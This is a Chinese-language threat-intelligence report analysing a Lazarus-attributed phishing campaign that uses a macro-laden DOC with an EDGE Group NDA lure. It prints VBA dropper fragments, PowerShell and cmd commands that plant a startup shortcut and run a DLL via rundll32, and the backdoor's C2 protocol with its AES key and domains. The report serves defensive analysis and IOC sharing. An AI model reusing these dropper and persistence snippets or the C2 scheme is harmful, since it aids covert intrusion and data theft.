概述
瑞星威胁情报平台在日常威胁监测中发现一起针对性网络攻击事件,攻击手法呈现高度精准的社会工程学特征。攻击者通过钓鱼邮件等社会工程学手段,向特定目标投递包含恶意宏代码的DOC文档。该恶意文档采用双重诱饵机制:当受害者执行宏代码后,系统首先释放名为EDGE_Group_Interview_NDA.docx的诱饵文档以降低用户警觉性,同时在后台静默执行恶意负载(包括多个恶意DLL组件),建立与远程C&C服务器的通信信道并接收后续攻击指令。整个攻击过程通过文档替换的方式实现无感知入侵,使受害者误认为仅打开了一个普通的商务文档。
基于攻击技术特征分析和威胁情报关联,本次事件与知名APT组织Lazarus(又称APT-C-26、T-APT-15)存在高度关联性。Lazarus组织是自2007年以来持续活跃的国家级威胁行为体,被广泛认为具有朝鲜国家背景。该组织以其多样化的攻击目标和复杂的攻击技术著称,攻击动机涵盖情报收集、经济利益获取和破坏性活动。其攻击范围遍及全球,重点目标包括中国、德国、澳大利亚、日本等国家的航空航天、政府机构、医疗卫生、金融服务和媒体等关键基础设施领域。
ATT&CK矩阵
| 战术 | 技术 | 具体行为 |
|---|---|---|
TA0002-执行 |
T1204-用户执行 |
通过社会工程学诱导目标用户执行恶意宏文档 |
TA0002-执行 |
T1059-命令和脚本解释器 |
执行CMD命令和PowerShell代码 |
TA0003-持久化 |
T1547-启动或登陆自动执行 |
在Windows启动目录植入恶意快捷方式实现持久化 |
TA0005-防御规避 |
T1140-去混淆或解密文件和信息 |
在内存中解密执行黑DLL |
TA0005-防御规避 |
T1218利用签名的二进制程序 |
利用rundll32.exe运行DLL |
TA0010-外传信息 |
T1041-通过C2通道外传 |
通过建立的C2通信信道进行数据窃取和外传 |
TA0011-指挥与控制 |
T1132-数据编码 |
联网返回的数据使用了Base64编码 |
TA0011-指挥与控制 |
T1573-加密通道 |
联网传递及返回的数据被AES加密 |
事件详情
EDGE_Group_Interview_NDA.docx诱饵文档的内容主要是关于阿联酋境内国防公司EDGE集团的求职面试保密协议。EDGE集团是中东地区领先的国防科技公司,业务涵盖航空、陆战装备等领域,猜测攻击者的目标可能是EDGE集团员工或者求职人员,若攻击成功,可能进一步渗透至企业内部网络,窃取国防科技相关数据或破坏业务系统等。
攻击流程
攻击者利用宏病毒对目标进行攻击,当用户打开宏文档成功运行宏代码后,会释放和打开诱饵文档迷惑用户的同时还会释放执行恶意DLL。
相关负载分析
宏文档分析
| 字段 | 内容 |
|---|---|
| 文件MD5 | D90AEEA054AE8CFBD6FCA2BD1588A852 |
| 文件类型 | DOC |
| 文件大小 | 324 KB (332,397 字节) |
| 病毒名 | Dropper.[Lazarus]Agent/VBA!1.12E8C |
创建C:\ProgramData\WPSOffice和C:\ProgramData\Document文件夹,在这两个文件夹中释放诱饵文档EDGE_Group_Interview_NDA.docx,最后打开C:\ProgramData\Document文件夹中的诱饵文档
folderpath = "C:\ProgramData\WPSOffice"
orgfolderpath = "C:\ProgramData\Document"
MkDir (folderpath)
MkDir (orgfolderpath)
orgdocpath = folderpath & "\" & "EDGE_Group_Interview_NDA.docx"
orgnewpath = orgfolderpath & "\" & "EDGE_Group_Interview_NDA.docx"
ExtractOrgDoc (orgnewpath) 在C:\ProgramData\WPSOffice文件夹中释放黑DLL文件wpsoffice_aam.ocx,最后利用LoadLibraryA加载该DLL
loaderpath = folderpath & "\wpsoffice_aam.ocx"
ExtractLoader (loaderpath)
tcueomylalbo (loaderpath) 关闭当前运行的WORD应用程序,在退出时文档不会保留任何更改
Dim objDocApp
Set objDocApp = CreateObject("Word.Application")
objDocApp.Visible = True
objDocApp.Documents.Open orgnewpath
Application.Quit (wdDoNotSaveChanges)wpsoffice_aam.ocx分析
| 字段 | 内容 |
|---|---|
| 文件名 | wpsoffice_aam.ocx |
| 文件MD5 | 71246DECBAE855FBB15039E4BAFB0322 |
| 文件类型 | DLL |
| 文件大小 | 287 KB (294,400 字节) |
| 病毒名 | Trojan.Loader!1.12E92 |
创建黑DLL文件:C:\ProgramData\USOShared\USOPrivate.dll
利用CreateProcessA执行一段PowerShell代码,该PowerShell的主要作用是创建快捷方式C:\ProgramData\USOShared\Micro.lnk,该快捷方式的目标路径为C:\Windows\System32\rundll32.exe,参数为C:\ProgramData\USOShared\USOPrivate.dll LoadMimi C:\Windows\System32\cmd.exe,也就是说利用rundll32.exe加载USOPrivate.dll并调用其中的LoadMimi函数,同时将cmd.exe作为参数传递给LoadMimi函数
$s = (New-Object -COM WScript.Shell).CreateShortcut('C:\ProgramData\USOShared\Micro.lnk');
$s.TargetPath = 'C:\Windows\System32\rundll32.exe';
$s.Arguments = '\"C:\ProgramData\USOShared\USOPrivate.dll\" LoadMimi \"C:\Windows\System32\cmd.exe\"';
$s.Save() 利用CreateProcessA执行一段CMD命令,作用是将快捷方式C:\ProgramData\USOShared\Micro.lnk移动到%appdata\Microsoft\Windows\Start Menu\Programs\Startup\Micro.lnk,达到开机启动快捷方式Micro.lnk的目的
cmd.exe /c move C:\ProgramData\USOShared\Micro.lnk "C:\Users\gg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Micro.lnk" 利用CreateProcessA执行一段CMD命令,作用是利用rundll32.exe执行C:\ProgramData\USOShared\USOPrivate.dll的导出函数LoadMimi
cmd.exe /c rundll32.exe C:\ProgramData\USOShared\USOPrivate.dll LoadMimiUSOPrivate.dll分析
| 字段 | 内容 |
|---|---|
| 文件名 | USOPrivate.dll |
| 文件MD5 | 6F3BD09ED57BE2C7457C01721BBDA990 |
| 文件类型 | DLL |
| 文件大小 | 240 KB (245,760 字节) |
| 病毒名 | Trojan.Loader!1.12E92 |
内存解密出黑DLL并执行其导出函数GetWindowSizedW
内存解密出的黑DLL分析
| 字段 | 内容 |
|---|---|
| 文件MD5 | 7F0AD9C47D4066F4552A8D9D0A53E25A |
| 文件类型 | DLL |
| 文件大小 | 236 KB (242,176 字节) |
| 病毒名 | Backdoor.[Lazarus]Agent!1.12E70 |
获取系统时间,格式为%04d-%02d-%02d %02d:%02d:%02d
生成多组随机数,将它们与BASE64编码后的系统时间进行拼接,
利用AES算法加密数据,密钥和IV都为:x!P<&}mjH2YHRQ',最后将AES算法加密后的数据通过BASE64进行编码
发送HTTP请求,主机名为:hiremployee.com,端口:443,发送的内容为上述AES算法加密和BASE64编码后的数据
获取数据,将数据解密,解密流程为:
- 利用
BASE64算法进行解码后,再利用AES算法进行解密,密钥和IV都为:x!P<&}mjH2YHRQ',
- 将解密后的数据中的空格全部用
+替代,再调用三次strtol函数解析得到最终需要的字符串,将字符串中的空格用+替代,最后将转换好的字符串通过BASE64解码
判断解密后的数据其是0,1,还是带|的数据:
- 如果解密后的数据为
0:更新联网地址重新发送请求获取数据(此次网络地址都是同一个hiremployee.com)
- 如果解密后的数据为
1:重新向当前网络地址发送请求获取数据
- 如果解密后的数据带
|分隔符,解析数据后继续执行后续操作
再次发送请求,此次请求的内容除了系统时间还加上了和前面获取到的数据相关的信息
获取数据进行解密后,将数据长度等相关的内容带上系统时间加密发送给服务器
经过多次请求数据获取数据的操作后,得到可执行有效数据
将获取的数据解密后内存执行(暂未获得后续执行的数据)
关联分析
| 字段 | 内容 |
|---|---|
| 文件名 | EDGE_Group_Interview_NDA.docx |
| 文件MD5 | 02FABAA4EEAF1D09AF588D42863726F3 |
| 文件类型 | DOCX |
| 文件大小 | 277 KB (284,236 字节) |
| 备注 | 模板注入 |
和诱饵文档同名的DOCX文档EDGE_Group_Interview_NDA.docx会从这个链接拉取模板:hxxps://office-theme.com/download.asp?layout=984
该模板的数据并未获取到,但是访问office-theme.com发现,其存放的文件中包含了多个宏文档,其含有的宏代码和上述分析的相似。
该服务器上大部分文件不是获取到的数据大小为0,就是返回404下载失败,能获取到的有数据的文件如下(其中含有当前分析的宏文档):
| 文件名 | MD5 | 备注 | 病毒名 |
|---|---|---|---|
| y7jduMy4zLjRuNa437iFuIu4jriOuA==.zip | 126961B8C9A7A0E78899943F6C2A7CE9 | 宏文档 | Dropper.[Lazarus]Agent/VBA!1.12E8C |
| 1LjZuMG417jNuMy4hbiBuIC4jLg=.zip | D90AEEA054AE8CFBD6FCA2BD1588A852 | 宏文档 | Dropper.[Lazarus]Agent/VBA!1.12E8C |
| 1LjZuMG417jNuMy4hbiPuIi4iriIuA==.zip | E4541D91FCA9DF943B6E119DC1C6CD7F | 宏文档 | Dropper.[Lazarus]Agent/VBA!1.12E8C |
| desktops.inf | 6EA9AFA53B13C9C9885CBF27E4C869E0 | 加密 | – |
| y7jduMy4zLjRuNa437iFuIu4jriOuA==.bmp | C696A3FC7D1C582F99D8C4F0A3B949E5 | 加密 | – |
| 1LjZuMG417jNuMy4hbiBuIC4jLg=.bmp | E202F470922E04E8B78E63B553F13130 | 加密 | – |
攻击过程可视化(EDR)
基于瑞星EDR终端检测与响应平台的实时监控数据,通过威胁行为可视化分析功能,完整还原了本次APT攻击的执行过程和关联关系。可视化图表清晰展示了攻击活动中的进程执行树、文件系统操作、网络通信行为以及相关域名解析等关键威胁指标:
总结
APT攻击有着针对性强、组织严密、持续时间长、高隐蔽性和间接攻击的显著特征,针对的目标都是具有重大信息资产,如国家军事、情报、战略部门和影响国计民生的行业如金融、能源等,国内相关政府机构和企业单位务必要引起重视,加强防御措施。
预防措施
-
不打开可疑文件。
不打开未知来源的可疑的文件和邮件,防止社会工程学和钓鱼攻击。
-
部署网络安全态势感知、预警系统等网关安全产品。
网关安全产品可利用威胁情报追溯威胁行为轨迹,帮助用户进行威胁行为分析、定位威胁源和目的,追溯攻击的手段和路径,从源头解决网络威胁,最大范围内发现被攻击的节点,帮助企业更快响应和处理。
-
安装有效的杀毒软件,拦截查杀恶意文档和木马病毒。
杀毒软件可拦截恶意文档和木马病毒,如果用户不小心下载了恶意文件,杀毒软件可拦截查杀,阻止病毒运行,保护用户的终端安全。
瑞星ESM目前已经可以检出此次攻击事件的相关样本
-
及时修补系统补丁和重要软件的补丁。
沦陷信标(IOC)
-
MD5
D90AEEA054AE8CFBD6FCA2BD1588A852 71246DECBAE855FBB15039E4BAFB0322 6F3BD09ED57BE2C7457C01721BBDA990 02FABAA4EEAF1D09AF588D42863726F3 126961B8C9A7A0E78899943F6C2A7CE9 E4541D91FCA9DF943B6E119DC1C6CD7F -
Domain
hiremployee.com office-theme.com -
瑞星病毒名
Dropper.[Lazarus]Agent/VBA!1.12E8C Backdoor.[Lazarus]Agent!1.12E70 Trojan.Loader!1.12E92